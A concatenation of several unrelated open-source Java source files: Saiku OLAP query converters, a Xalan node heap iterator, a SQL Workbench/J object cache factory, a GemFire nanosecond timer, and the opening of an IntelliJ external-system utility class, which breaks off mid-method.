levelUniqueName = ((Member) sel.getRootElement()).getLevel().getUniqueName();
}
String totalsFunction = query.getTotalFunction(level.getUniqueName());
List<QueryDimension> dimensions = dim.getAxis().getDimensions();
QueryDimension lastDimension = dimensions.get(dimensions.size() - 1);
Selection deepestSelection = null;
int selectionDepth = -1;
for (Selection selection : lastDimension.getInclusions()) {
Level current = getSelectionLevel(selection);
if (selectionDepth < current.getDepth()) {
deepestSelection = selection;
selectionDepth = current.getDepth();
}
}
return new SaikuSelection(
sel.getRootElement().getName(),
sel.getUniqueName(),
sel.getRootElement().getCaption(),
sel.getRootElement().getDescription(),
sel.getDimension().getName(),
hierarchyUniqueName,
levelUniqueName,
type,
totalsFunction,
sel.equals(deepestSelection));
}
@NotNull
public static SaikuMember convert(@NotNull Member m) {
return new SaikuMember(
m.getName(),
m.getUniqueName(),
m.getCaption(),
m.getDescription(),
m.getDimension().getUniqueName(),
m.getHierarchy().getUniqueName(),
m.getLevel().getUniqueName(),
m.isCalculated());
}
@NotNull
public static SaikuMeasure convertMeasure(@NotNull Measure m) {
Map<String, Property> props2 = m.getProperties().asMap();
NamedList<Property> props = m.getProperties();
//String f = m.getPropertyValue(Property.);
String f = SaikuMondrianHelper.getMeasureGroup(m);
return new SaikuMeasure(
m.getName(),
m.getUniqueName(),
m.getCaption(),
m.getDescription(),
m.getDimension().getUniqueName(),
m.getHierarchy().getUniqueName(),
m.getLevel().getUniqueName(),
m.isVisible(),
m.isCalculated() || m.isCalculatedInQuery(),
f);
}
@NotNull
public static SaikuDimensionSelection convertDimensionSelection(@NotNull QueryDimension dim, @NotNull IQuery query) {
List<SaikuSelection> selections = ObjectUtil.convertSelections(dim.getInclusions(), dim, query);
return new SaikuDimensionSelection(
dim.getName(),
dim.getDimension().getUniqueName(),
dim.getDimension().getCaption(),
dim.getDimension().getDescription(),
selections);
}
@NotNull
private static List<SaikuDimensionSelection> convertDimensionSelections(@NotNull List<QueryDimension> dimensions,
@NotNull IQuery query) {
List<SaikuDimensionSelection> dims = new ArrayList<>();
for (QueryDimension dim : dimensions) {
dims.add(convertDimensionSelection(dim, query));
}
return dims;
}
@NotNull
private static SaikuAxis convertQueryAxis(@NotNull QueryAxis axis, @NotNull IQuery query) {
List<SaikuDimensionSelection> dims = ObjectUtil.convertDimensionSelections(axis.getDimensions(), query);
Axis location = axis.getLocation();
String so = axis.getSortOrder() == null ? null : axis.getSortOrder().name();
SaikuAxis sax = new SaikuAxis(
location.name(),
location.axisOrdinal(),
axis.getName(),
dims,
so,
axis.getSortIdentifierNodeName(),
query.getTotalFunction(axis.getName()));
try {
if (axis.getLimitFunction() != null) {
sax.setLimitFunction(axis.getLimitFunction().toString());
sax.setLimitFunctionN(axis.getLimitFunctionN().toPlainString());
sax.setLimitFunctionSortLiteral(axis.getLimitFunctionSortLiteral());
}
if (StringUtils.isNotBlank(axis.getFilterCondition())) {
sax.setFilterCondition(axis.getFilterCondition());
}
} catch (Error e) {
LOG.error("Could not convert query axis", e);
}
return sax;
}
@NotNull
public static SaikuQuery convert(@NotNull IQuery q) {
List<SaikuAxis> axes = new ArrayList<>();
if (q.getType().equals(IQuery.QueryType.QM)) {
for (Axis axis : q.getAxes().keySet()) {
if (axis != null) {
axes.add(convertQueryAxis(q.getAxis(axis), q));
}
}
}
return new SaikuQuery(q.getName(), q.getSaikuCube(), axes, q.getMdx(), q.getType().toString(), q.getProperties());
}
@NotNull
public static List<SimpleCubeElement> convert2Simple(@Nullable Collection<? extends MetadataElement> mset) {
List<SimpleCubeElement> elements = new ArrayList<>();
if (mset != null) {
for (MetadataElement e : mset) {
elements.add(new SimpleCubeElement(e.getName(), e.getUniqueName(), e.getCaption()));
}
}
return elements;
}
@NotNull
public static List<SimpleCubeElement> convert2simple(@Nullable ResultSet rs) {
try {
int width = 0;
boolean first = true;
List<SimpleCubeElement> elements = new ArrayList<>();
if (rs != null) {
while (rs.next()) {
if (first) {
first = false;
width = rs.getMetaData().getColumnCount();
}
String[] row = new String[3];
for (int i = 0; i < width; i++) {
row[i] = rs.getString(i + 1);
}
SimpleCubeElement s = new SimpleCubeElement(row[0], row[1], row[2]);
elements.add(s);
}
}
return elements;
} catch (Exception e) {
throw new SaikuServiceException("Error converting ResultSet into SimpleCubeElement", e);
} finally {
if (rs != null) {
Statement statement = null;
Connection con = null;
try {
statement = rs.getStatement();
} catch (Exception e) {
throw new SaikuServiceException(e);
} finally {
try {
rs.close();
if (statement != null) {
statement.close();
}
} catch (Exception ee) {
LOG.error("Could not close statement", ee);
}
rs = null;
}
}
}
}
}
|
|
/*
* reserved comment block
* DO NOT REMOVE OR ALTER!
*/
/*
* Copyright 2001-2006 The Apache Software Foundation.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
/*
* $Id: UnionIterator.java 337874 2004-02-16 23:06:53Z minchau $
*/
package com.sun.org.apache.xalan.internal.xsltc.dom;
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.runtime.BasisLibrary;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.dtm.ref.DTMAxisIteratorBase;
/**
* <p><code>MultiValuedNodeHeapIterator</code> takes a set of multi-valued
* heap nodes and produces a merged NodeSet in document order with duplicates
* removed.</p>
* <p>Each multi-valued heap node (which might be a
* {@link org.apache.xml.dtm.DTMAxisIterator}, but that's not necessary)
* generates DTM node handles in document order. The class
* maintains the multi-valued heap nodes in a heap, not surprisingly, sorted by
* the next DTM node handle available from the heap node.</p>
* <p>After a DTM node is pulled from the heap node that's at the top of the
* heap, the heap node is advanced to the next DTM node handle it makes
* available, and the heap nature of the heap is restored to ensure the next
* DTM node handle pulled is next in document order overall.</p>
*
* @author Jacek Ambroziak
* @author Santiago Pericas-Geertsen
*/
public abstract class MultiValuedNodeHeapIterator extends DTMAxisIteratorBase {
/** wrapper for NodeIterators to support iterator
comparison on the value of their next() method
*/
/**
* An abstract representation of a set of nodes that will be retrieved in
* document order.
*/
public abstract class HeapNode implements Cloneable {
protected int _node, _markedNode;
protected boolean _isStartSet = false;
/**
* Advance to the next node represented by this {@link HeapNode}
*
* @return the next DTM node.
*/
public abstract int step();
/**
* Creates a deep copy of this {@link HeapNode}. The clone is not
* reset from the current position of the original.
*
* @return the cloned heap node
*/
public HeapNode cloneHeapNode() {
HeapNode clone;
try {
clone = (HeapNode) super.clone();
} catch (CloneNotSupportedException e) {
BasisLibrary.runTimeError(BasisLibrary.ITERATOR_CLONE_ERR,
e.toString());
return null;
}
clone._node = _node;
clone._markedNode = _node;
return clone;
}
/**
* Remembers the current node for the next call to {@link #gotoMark()}.
*/
public void setMark() {
_markedNode = _node;
}
/**
* Restores the current node remembered by {@link #setMark()}.
*/
public void gotoMark() {
_node = _markedNode;
}
/**
* Performs a comparison of the two heap nodes
*
* @param heapNode the heap node against which to compare
* @return <code>true</code> if and only if the current node for this
* heap node is before the current node of the argument heap
* node in document order.
*/
public abstract boolean isLessThan(HeapNode heapNode);
/**
* Sets context with respect to which this heap node is evaluated.
*
* @param node The new context node
* @return a {@link HeapNode} which may or may not be the same as
* this <code>HeapNode</code>.
*/
public abstract HeapNode setStartNode(int node);
/**
* Reset the heap node back to its beginning.
*
* @return a {@link HeapNode} which may or may not be the same as
* this <code>HeapNode</code>.
*/
public abstract HeapNode reset();
} // end of HeapNode
private static final int InitSize = 8;
private int _heapSize = 0;
private int _size = InitSize;
private HeapNode[] _heap = new HeapNode[InitSize];
private int _free = 0;
// Last node returned by this MultiValuedNodeHeapIterator to the caller of
// next; used to prune duplicates
private int _returnedLast;
// cached returned last for use in gotoMark
private int _cachedReturnedLast = END;
// cached heap size for use in gotoMark
private int _cachedHeapSize;
public DTMAxisIterator cloneIterator() {
_isRestartable = false;
final HeapNode[] heapCopy = new HeapNode[_heap.length];
try {
MultiValuedNodeHeapIterator clone =
(MultiValuedNodeHeapIterator)super.clone();
for (int i = 0; i < _free; i++) {
heapCopy[i] = _heap[i].cloneHeapNode();
}
clone.setRestartable(false);
clone._heap = heapCopy;
return clone.reset();
}
catch (CloneNotSupportedException e) {
BasisLibrary.runTimeError(BasisLibrary.ITERATOR_CLONE_ERR,
e.toString());
return null;
}
}
protected void addHeapNode(HeapNode node) {
if (_free == _size) {
HeapNode[] newArray = new HeapNode[_size *= 2];
System.arraycopy(_heap, 0, newArray, 0, _free);
_heap = newArray;
}
_heapSize++;
_heap[_free++] = node;
}
public int next() {
while (_heapSize > 0) {
final int smallest = _heap[0]._node;
if (smallest == END) { // iterator _heap[0] is done
if (_heapSize > 1) {
// Swap first and last (iterator must be restartable)
final HeapNode temp = _heap[0];
_heap[0] = _heap[--_heapSize];
_heap[_heapSize] = temp;
}
else {
return END;
}
}
else if (smallest == _returnedLast) { // duplicate
_heap[0].step(); // value consumed
}
else {
_heap[0].step(); // value consumed
heapify(0);
return returnNode(_returnedLast = smallest);
}
// fallthrough if not returned above
heapify(0);
}
return END;
}
public DTMAxisIterator setStartNode(int node) {
if (_isRestartable) {
_startNode = node;
for (int i = 0; i < _free; i++) {
if(!_heap[i]._isStartSet){
_heap[i].setStartNode(node);
_heap[i].step(); // to get the first node
_heap[i]._isStartSet = true;
}
}
// build heap
for (int i = (_heapSize = _free)/2; i >= 0; i--) {
heapify(i);
}
_returnedLast = END;
return resetPosition();
}
return this;
}
protected void init() {
for (int i =0; i < _free; i++) {
_heap[i] = null;
}
_heapSize = 0;
_free = 0;
}
/* Build a heap in document order and put the smallest node on the top.
* "smallest node" means the node that comes before other nodes in document order.
*/
private void heapify(int i) {
for (int r, l, smallest;;) {
r = (i + 1) << 1; l = r - 1;
smallest = l < _heapSize
&& _heap[l].isLessThan(_heap[i]) ? l : i;
if (r < _heapSize && _heap[r].isLessThan(_heap[smallest])) {
smallest = r;
}
if (smallest != i) {
final HeapNode temp = _heap[smallest];
_heap[smallest] = _heap[i];
_heap[i] = temp;
i = smallest;
} else {
break;
}
}
}
public void setMark() {
for (int i = 0; i < _free; i++) {
_heap[i].setMark();
}
_cachedReturnedLast = _returnedLast;
_cachedHeapSize = _heapSize;
}
public void gotoMark() {
for (int i = 0; i < _free; i++) {
_heap[i].gotoMark();
}
// rebuild the heap after a call to the last() function; fix for bug 20913
for (int i = (_heapSize = _cachedHeapSize)/2; i >= 0; i--) {
heapify(i);
}
_returnedLast = _cachedReturnedLast;
}
public DTMAxisIterator reset() {
for (int i = 0; i < _free; i++) {
_heap[i].reset();
_heap[i].step();
}
// build heap
for (int i = (_heapSize = _free)/2; i >= 0; i--) {
heapify(i);
}
_returnedLast = END;
return resetPosition();
}
}
|
|
/*
* DbObjectCacheFactory.java
*
* This file is part of SQL Workbench/J, http://www.sql-workbench.net
*
* Copyright 2002-2015, Thomas Kellerer
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at.
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
* To contact the author please send an email to: [email protected]
*
*/
package workbench.db.objectcache;
import java.beans.PropertyChangeEvent;
import java.beans.PropertyChangeListener;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Map;
import java.util.Set;
import workbench.log.LogMgr;
import workbench.resource.GuiSettings;
import workbench.db.ConnectionProfile;
import workbench.db.WbConnection;
import workbench.util.CollectionUtil;
/**
* A factory for DbObjectCache instances.
*
* For each unique JDBC URL (including the username) one instance of the cache will be maintained.
*
* @author Thomas Kellerer
*/
public class DbObjectCacheFactory
implements PropertyChangeListener
{
public static final long CACHE_VERSION_UID = 1L;
private final Object lock = new Object();
private final Map<String, ObjectCache> caches = new HashMap<>();
private final Map<String, Set<String>> refCounter = new HashMap<>();
/**
* Thread safe singleton-instance
*/
protected static class LazyInstanceHolder
{
protected static final DbObjectCacheFactory instance = new DbObjectCacheFactory();
}
public static DbObjectCacheFactory getInstance()
{
return LazyInstanceHolder.instance;
}
private DbObjectCacheFactory()
{
}
private void loadCache(ObjectCache cache, WbConnection connection)
{
if (cache == null || connection == null) return;
if (useLocalCacheStorage(connection))
{
synchronized (lock)
{
ObjectCachePersistence persistence = new ObjectCachePersistence();
persistence.loadFromLocalFile(cache, connection);
}
}
}
private void saveCache(ObjectCache cache, WbConnection connection)
{
if (useLocalCacheStorage(connection))
{
ObjectCachePersistence persistence = new ObjectCachePersistence();
persistence.saveToLocalFile(cache, connection);
}
}
private boolean useLocalCacheStorage(WbConnection connection)
{
if (connection == null) return false;
ObjectCacheStorage storage = GuiSettings.getLocalStorageForObjectCache();
switch (storage)
{
case always:
return true;
case never:
return false;
case profile:
ConnectionProfile profile = connection.getProfile();
if (profile != null)
{
return profile.getStoreCacheLocally();
}
default:
return false;
}
}
public DbObjectCache getCache(WbConnection connection)
{
if (connection == null) return null;
String key = makeKey(connection);
synchronized (lock)
{
ObjectCache cache = caches.get(key);
if (cache == null)
{
LogMgr.logDebug("DbObjectCacheFactory.getCache()", "Creating new cache for: " + key);
cache = new ObjectCache(connection);
caches.put(key, cache);
}
DbObjectCache result = new DbObjectCache(cache, connection);
connection.addChangeListener(this);
boolean isUsed = isCacheInUse(key);
if (!isUsed)
{
// first time used, load the local storage
loadCache(cache, connection);
}
increaseRefCount(key, connection.getId());
return result;
}
}
private int decreaseRefCount(String key, String connectionId)
{
Set<String> ids = refCounter.get(key);
if (ids == null)
{
return 0;
}
ids.remove(connectionId);
return ids.size();
}
private void increaseRefCount(String key, String connectionId)
{
Set<String> ids = refCounter.get(key);
if (ids == null)
{
ids = new HashSet<>();
refCounter.put(key, ids);
}
ids.add(connectionId);
}
private boolean isCacheInUse(String key)
{
Set<String> ids = refCounter.get(key);
return CollectionUtil.isNonEmpty(ids);
}
private String makeKey(WbConnection connection)
{
return connection.getProfile().getLoginUser()+ "@" + connection.getProfile().getUrl();
}
/**
* Notification about the state of the connection. If the connection
* is closed, we can dispose the object cache
*/
@Override
public void propertyChange(PropertyChangeEvent evt)
{
if (WbConnection.PROP_CONNECTION_STATE.equals(evt.getPropertyName()) &&
WbConnection.CONNECTION_CLOSED.equals(evt.getNewValue()))
{
WbConnection conn = (WbConnection)evt.getSource();
synchronized (lock)
{
String key = makeKey(conn);
ObjectCache cache = caches.get(key);
int refCount = decreaseRefCount(key, conn.getId());
LogMgr.logDebug("DbObjectCacheFactory.propertyChange()", "Connection with key=" + key + " was closed. Reference count for this cache is: " + refCount);
if (cache != null && refCount <= 0)
{
saveCache(cache, conn);
cache.clear();
caches.remove(key);
LogMgr.logDebug("DbObjectCacheFactory.propertyChange()", "Removed cache for key=" + key);
}
conn.removeChangeListener(this);
}
}
}
public void clear()
{
synchronized(lock)
{
for (ObjectCache cache : caches.values())
{
cache.clear();
}
caches.clear();
}
}
}
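// Hedged usage sketch, not part of the original file: fetches the shared cache for an
// already established connection. "conn" is assumed to be a live WbConnection; every
// connection with the same user@url key shares one underlying ObjectCache instance.
class DbObjectCacheFactoryUsageSketch
{
	static DbObjectCache cacheFor(WbConnection conn)
	{
		return DbObjectCacheFactory.getInstance().getCache(conn);
	}
}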
|
|
/*
* Copyright (c) 2010-2015 Pivotal Software, Inc. All rights reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you
* may not use this file except in compliance with the License. You
* may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
* implied. See the License for the specific language governing
* permissions and limitations under the License. See accompanying
* LICENSE file.
*/
package com.gemstone.gemfire.internal;
import com.gemstone.gemfire.internal.cache.GemFireCacheImpl;
import com.gemstone.gemfire.internal.shared.NativeCalls;
import com.gemstone.gemfire.internal.shared.SystemProperties;
/**
* A timer class that reports current or elapsed time in nanoseconds.
* The static method {@link #getTime} reports the current time.
* The instance methods support basic
* stop-watch-style functions that are convenient for simple performance
* measurements. For example:
* <pre>
class Example {
void example() {
NanoTimer timer = new NanoTimer();
for (int i = 0; i < n; ++i) {
someComputationThatYouAreMeasuring();
long duration = timer.reset();
System.out.println("Duration: " + duration);
// To avoid contaminating timing with printing times,
// you could call reset again here.
}
long average = timer.getTimeSinceConstruction() / n;
System.out.println("Average: " + average);
}
}
* </pre>
*
* @author Darrel Schneider
* @author Kirk Lund
*/
public final class NanoTimer {
public static final long NANOS_PER_MILLISECOND = 1000000;
private static boolean isNativeTimer;
private static final NativeCalls nativeCall = NativeCalls.getInstance();
public static int CLOCKID_BEST;
public static boolean CLOCKID_USE_SYSNANOTIME;
public final static String NATIVETIMER_TYPE_PROPERTY =
"gemfire.nativetimer.type";
public static int nativeTimerType;
static {
init();
}
public static void init() {
/*
* currently _nanoTime(..) isn't implemented in the gemfire lib;
* for gemfirexd it is implemented only for Linux/Solaris as of now.
*
* TODO:SB: check for Mac/Linux variants.
*/
try {
isNativeTimer = GemFireCacheImpl.gfxdSystem()
&& NativeCalls.getInstance().loadNativeLibrary()
&& SharedLibrary.register("gemfirexd");
// test method call. can throw UnsatisfiedLinkError if unsuccessful.
_nanoTime(NativeCalls.CLOCKID_REALTIME);
} catch (Exception | UnsatisfiedLinkError e) {
isNativeTimer = false;
if (SharedLibrary.debug) {
SharedLibrary.logInitMessage(LogWriterImpl.WARNING_LEVEL,
"_nanoTime couldn't be invoked successfully.", e);
}
}
int clockIdBest = NativeCalls.CLOCKID_MONOTONIC;
if (isNativeTimer) {
final NativeCalls n = NativeCalls.getInstance();
if (n != null && n.isNativeTimerEnabled()) {
final String msg = "nanoTime clock resolution: MONOTONIC="
+ n.clockResolution(NativeCalls.CLOCKID_MONOTONIC)
+ " CLOCK_PROCESS_CPUTIME_ID="
+ n.clockResolution(NativeCalls.CLOCKID_PROCESS_CPUTIME_ID)
+ " CLOCK_THREAD_CPUTIME_ID="
+ n.clockResolution(NativeCalls.CLOCKID_THREAD_CPUTIME_ID);
SharedLibrary.logInitMessage(LogWriterImpl.INFO_LEVEL, msg, null);
String testMsg = "nanoTime time taken for call+loop:";
// don't really believe clock_getres
// clockIds listed in order of preference; MONOTONIC highest
// preference since if it is proper then it is most efficient
// via System.nanoTime() itself
int[] clockIds = { NativeCalls.CLOCKID_PROCESS_CPUTIME_ID,
NativeCalls.CLOCKID_THREAD_CPUTIME_ID,
NativeCalls.CLOCKID_MONOTONIC };
// keep some warmup runs
int numRuns = 5;
while (numRuns-- > 0) {
clockIdBest = NativeCalls.CLOCKID_MONOTONIC;
for (int clockId : clockIds) {
int sum = 0;
long start = _nanoTime(clockId);
for (int i = 0; i < 50; i++) {
sum += i;
}
long end = _nanoTime(clockId);
if (numRuns == 0) {
testMsg += " CLOCKID=" + clockId + " time=" + (end - start)
+ "nanos (sum=" + sum + ')';
}
if (end > start) {
clockIdBest = clockId;
}
}
}
SharedLibrary.logInitMessage(LogWriterImpl.FINE_LEVEL, testMsg, null);
}
}
CLOCKID_BEST = clockIdBest;
SharedLibrary.logInitMessage(LogWriterImpl.FINE_LEVEL,
"Choosing CLOCKID=" + CLOCKID_BEST, null);
setNativeTimer(true,
getNativeTimerTypeFromString(SystemProperties.getServerInstance()
.getString(NATIVETIMER_TYPE_PROPERTY, "DEFAULT")));
}
/**
* Implemented in utils.c (@see com/pivotal/gemfirexd/internal/engine) and packaged
* into the gemfirexd native library. Any change to the implementation should be
* recompiled using gfxd-rebuild-shared-library after incrementing the library
* version (gemfirexd.native.version) in the build script.
*
* @param clk_id
* enumeration constants as defined here.
*/
public static native long _nanoTime(int clk_id);
/**
* The timestamp taken when this timer was constructed.
*/
private final long constructionTime;
/**
* The timestamp taken when this timer was last reset or constructed.
*/
private long lastResetTime;
/**
* Create a NanoTimer.
*/
public NanoTimer() {
this.lastResetTime = getTime();
this.constructionTime = this.lastResetTime;
}
/**
* Converts nanoseconds to milliseconds by dividing nanos by
* {@link #NANOS_PER_MILLISECOND}.
*
* @param nanos value in nanoseconds
* @return value converted to milliseconds
*/
public static long nanosToMillis(long nanos) {
return nanos / NANOS_PER_MILLISECOND;
}
/**
* Converts milliseconds to nanoseconds by multiplying millis by
* {@link #NANOS_PER_MILLISECOND}.
*
* @param millis value in milliseconds
* @return value converted to nanoseconds
*/
public static long millisToNanos(long millis) {
return millis * NANOS_PER_MILLISECOND;
}
/**
* Return the time in nanoseconds since some arbitrary time in the past.
* The time rolls over to zero every 2^64 nanosecs (approx 584 years).
* Interval computations spanning periods longer than this will be wrong.
*/
public static long getTime() {
return java.lang.System.nanoTime();
}
/**
* Indicates whether native library will be used.
*
* @return returns whether JNI based timer is enabled.
*/
public static final boolean isJNINativeTimerEnabled() {
return isNativeTimer;
}
/**
* Check native timer using jni/jna is implemented in this platform.
*
* @return true if using o/s level system call via jni otherwise false.
* @see #isJNINativeTimerEnabled()
*/
public static final boolean isNativeTimerEnabled() {
return isNativeTimer || nativeCall.isNativeTimerEnabled();
}
/**
* Nanosecond-precision performance counter using a native system call. Calling
* overhead is listed below for various kinds of clocks. If a high-precision
* counter is unsupported by the o/s, or the high-precision clock isn't implemented
* yet, this falls back to java.lang.System.nanoTime.<br>
*
* The values for <code>clock_id</code> argument now reside in
* {@link NativeCalls} class.
*
* @param clock_id
* <dl>
* <dt>CLOCK_THREAD_CPUTIME_ID</dt>
* <U>In Linux:<br>
* </U> Average overhead is ~120 nanosecond irrespective of number of
* threads. This is because it provides thread work time excluding
* unscheduled wait time by the o/s (@see clock_gettime). <br>
* <br>
*
* <dt>CLOCK_PROCESS_CPUTIME_ID</dt>
* <U>In Linux:<br>
* </U> Average overhead varies depending on number of concurrent
* threads. For single threaded call it incurs ~5 to ~11 microsecond
* <br>
* <br>
*
* <dt>CLOCK_REALTIME, CLOCK_MONOTONIC, CLOCK_MONOTONIC_RAW</dt>
* <U>In Linux:<br>
* </U> Yields similar performance as o/s clock resolution offered by
* java.lang.System.nanoTime.
* </dl>
*
* @param useJNA
* if false, avoids JNA system call. if true, attempts to use jni for
* implemented platforms otherwise uses jna implementation. if
* neither is supported, returns System.nanoTime.
*
* @see #isNativeTimerEnabled()
* @return performance counter long value.
*/
public static final long nativeNanoTime(final int clock_id,
final boolean useJNA) {
return (isNativeTimer ? _nanoTime(clock_id)
: (useJNA ? NativeCalls.getInstance().nanoTime(clock_id)
: java.lang.System.nanoTime()));
}
/**
*
* This function was added because a call to {@link #nativeNanoTime(int, boolean)} with
* CLOCKID_PROCESS_CPUTIME_ID can take a few milliseconds. With that, EXPLAIN query
* scenarios are terribly slow because there can be millions of calls to nanoTime.
* java.lang.System.nanoTime() should be adequate in most cases because the timer
* resolution is 1 ns and a call costs a few tens of nanoseconds, so it is made the
* default behavior. If {@link #NATIVETIMER_TYPE_PROPERTY} is set then a native
* timer of the specified type is used.
*/
public static final long nanoTime() {
return CLOCKID_USE_SYSNANOTIME ? java.lang.System.nanoTime()
: nativeNanoTime(nativeTimerType, true);
}
/**
* Return the construction time in nanoseconds since some arbitrary time
* in the past.
*
* @return timestamp in nanoseconds since construction.
*/
public long getConstructionTime() {
return this.constructionTime;
}
/**
* Return the last reset time in nanoseconds since some arbitrary time
* in the past.
* <p/>
* The time rolls over to zero every 2^64 nanosecs (approx 584 years).
* Interval computations spanning periods longer than this will be wrong.
* If the timer has not yet been reset then the construction time
* is returned.
*
* @return timestamp in nanoseconds of construction or the last reset.
*/
public long getLastResetTime() {
return this.lastResetTime;
}
/**
* Compute and return the time in nanoseconds since the last reset or
* construction of this timer, and reset the timer to the current
* {@link #getTime}.
*
* @return time in nanoseconds since construction or last reset.
*/
public long reset() {
long save = this.lastResetTime;
this.lastResetTime = getTime();
return this.lastResetTime - save;
}
/**
* Compute and return the time in nanoseconds since the last reset or
* construction of this Timer, but does not reset this timer.
*
* @return time in nanoseconds since construction or last reset.
*/
public long getTimeSinceReset() {
return getTime() - this.lastResetTime;
}
/**
* Compute and return the time in nanoseconds since this timer was
* constructed.
*
* @return time in nanoseconds since construction.
*/
public long getTimeSinceConstruction() {
return getTime() - this.constructionTime;
}
static final int getNativeTimerTypeFromString(String timerType) {
timerType = timerType.toUpperCase();
if (timerType.equals("CLOCK_REALTIME")) {
return NativeCalls.CLOCKID_REALTIME;
} else if (timerType.equals("CLOCK_MONOTONIC")) {
return NativeCalls.CLOCKID_MONOTONIC;
} else if (timerType.equals("CLOCK_PROCESS_CPUTIME_ID")) {
return NativeCalls.CLOCKID_PROCESS_CPUTIME_ID;
} else if (timerType.equals("CLOCK_THREAD_CPUTIME_ID")) {
return NativeCalls.CLOCKID_THREAD_CPUTIME_ID;
} else if (timerType.equals("CLOCK_MONOTONIC_RAW")) {
return NativeCalls.CLOCKID_MONOTONIC_RAW;
} else if (timerType.equals("DEFAULT")) {
return CLOCKID_BEST;
} else {
throw new IllegalArgumentException(
"Unknown native clockId type = " + timerType);
}
}
public static final void setNativeTimer(boolean nativeTimer,
String timerType) {
setNativeTimer(nativeTimer, getNativeTimerTypeFromString(timerType));
}
static final void setNativeTimer(boolean nativeTimer, int timerType) {
if (nativeTimer) {
nativeTimerType = timerType;
CLOCKID_USE_SYSNANOTIME = (timerType == NativeCalls.CLOCKID_MONOTONIC);
} else {
// reset to default timer type ignoring the actual argument
nativeTimerType = NativeCalls.CLOCKID_MONOTONIC;
CLOCKID_USE_SYSNANOTIME = true;
}
}
public static final boolean getIsNativeTimer() {
return nativeTimerType != NativeCalls.CLOCKID_MONOTONIC;
}
public static final String getNativeTimerType() {
switch (nativeTimerType) {
case NativeCalls.CLOCKID_REALTIME:
return "CLOCK_REALTIME";
case NativeCalls.CLOCKID_MONOTONIC:
return "CLOCK_MONOTONIC";
case NativeCalls.CLOCKID_PROCESS_CPUTIME_ID:
return "CLOCK_PROCESS_CPUTIME_ID";
case NativeCalls.CLOCKID_THREAD_CPUTIME_ID:
return "CLOCK_THREAD_CPUTIME_ID";
case NativeCalls.CLOCKID_MONOTONIC_RAW:
return "CLOCK_MONOTONIC_RAW";
default:
return "UNKNOWN";
}
}
}
|
|
/*
* Copyright 2000-2013 JetBrains s.r.o.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.intellij.openapi.externalSystem.util;
import com.intellij.execution.rmi.RemoteUtil;
import com.intellij.ide.util.PropertiesComponent;
import com.intellij.openapi.application.ApplicationManager;
import com.intellij.openapi.application.PathManager;
import com.intellij.openapi.diagnostic.Logger;
import com.intellij.openapi.externalSystem.ExternalSystemAutoImportAware;
import com.intellij.openapi.externalSystem.ExternalSystemManager;
import com.intellij.openapi.externalSystem.model.DataNode;
import com.intellij.openapi.externalSystem.model.ExternalSystemException;
import com.intellij.openapi.externalSystem.model.Key;
import com.intellij.openapi.externalSystem.model.ProjectSystemId;
import com.intellij.openapi.fileTypes.FileTypes;
import com.intellij.openapi.project.Project;
import com.intellij.openapi.project.ProjectManager;
import com.intellij.openapi.roots.OrderRootType;
import com.intellij.openapi.roots.libraries.Library;
import com.intellij.openapi.util.AtomicNotNullLazyValue;
import com.intellij.openapi.util.NotNullLazyValue;
import com.intellij.openapi.util.io.FileUtil;
import com.intellij.openapi.util.text.StringUtil;
import com.intellij.openapi.vfs.JarFileSystem;
import com.intellij.openapi.vfs.VirtualFile;
import com.intellij.util.BooleanFunction;
import com.intellij.util.NullableFunction;
import com.intellij.util.PathUtil;
import com.intellij.util.PathsList;
import com.intellij.util.containers.ContainerUtilRt;
import com.intellij.util.ui.UIUtil;
import org.jetbrains.annotations.NotNull;
import org.jetbrains.annotations.Nullable;
import java.io.File;
import java.io.PrintWriter;
import java.io.StringWriter;
import java.util.*;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
/**
* @author Denis Zhdanov
* @since 4/1/13 1:31 PM
*/
public class ExternalSystemApiUtil {
private static final Logger LOG = Logger.getInstance("#" + ExternalSystemApiUtil.class.getName());
private static final String LAST_USED_PROJECT_PATH_PREFIX = "LAST_EXTERNAL_PROJECT_PATH_";
@NotNull public static final String PATH_SEPARATOR = "/";
@NotNull private static final Pattern ARTIFACT_PATTERN = Pattern.compile("(?:.*/)?(.+?)(?:-([\\d+](?:\\.[\\d]+)*))?(?:\\.[^\\.]+?)?");
@NotNull private static final NotNullLazyValue<Map<ProjectSystemId, ExternalSystemManager<?, ?, ?, ?, ?>>> MANAGERS =
new AtomicNotNullLazyValue<Map<ProjectSystemId, ExternalSystemManager<?, ?, ?, ?, ?>>>() {
@NotNull
@Override
protected Map<ProjectSystemId, ExternalSystemManager<?, ?, ?, ?, ?>> compute() {
Map<ProjectSystemId, ExternalSystemManager<?, ?, ?, ?, ?>> result = ContainerUtilRt.newHashMap();
for (ExternalSystemManager manager : ExternalSystemManager.EP_NAME.getExtensions()) {
result.put(manager.getSystemId(), manager);
}
return result;
}
};
@NotNull public static final Comparator<Object> ORDER_AWARE_COMPARATOR = new Comparator<Object>() {
@Override
public int compare(Object o1, Object o2) {
int order1 = getOrder(o1);
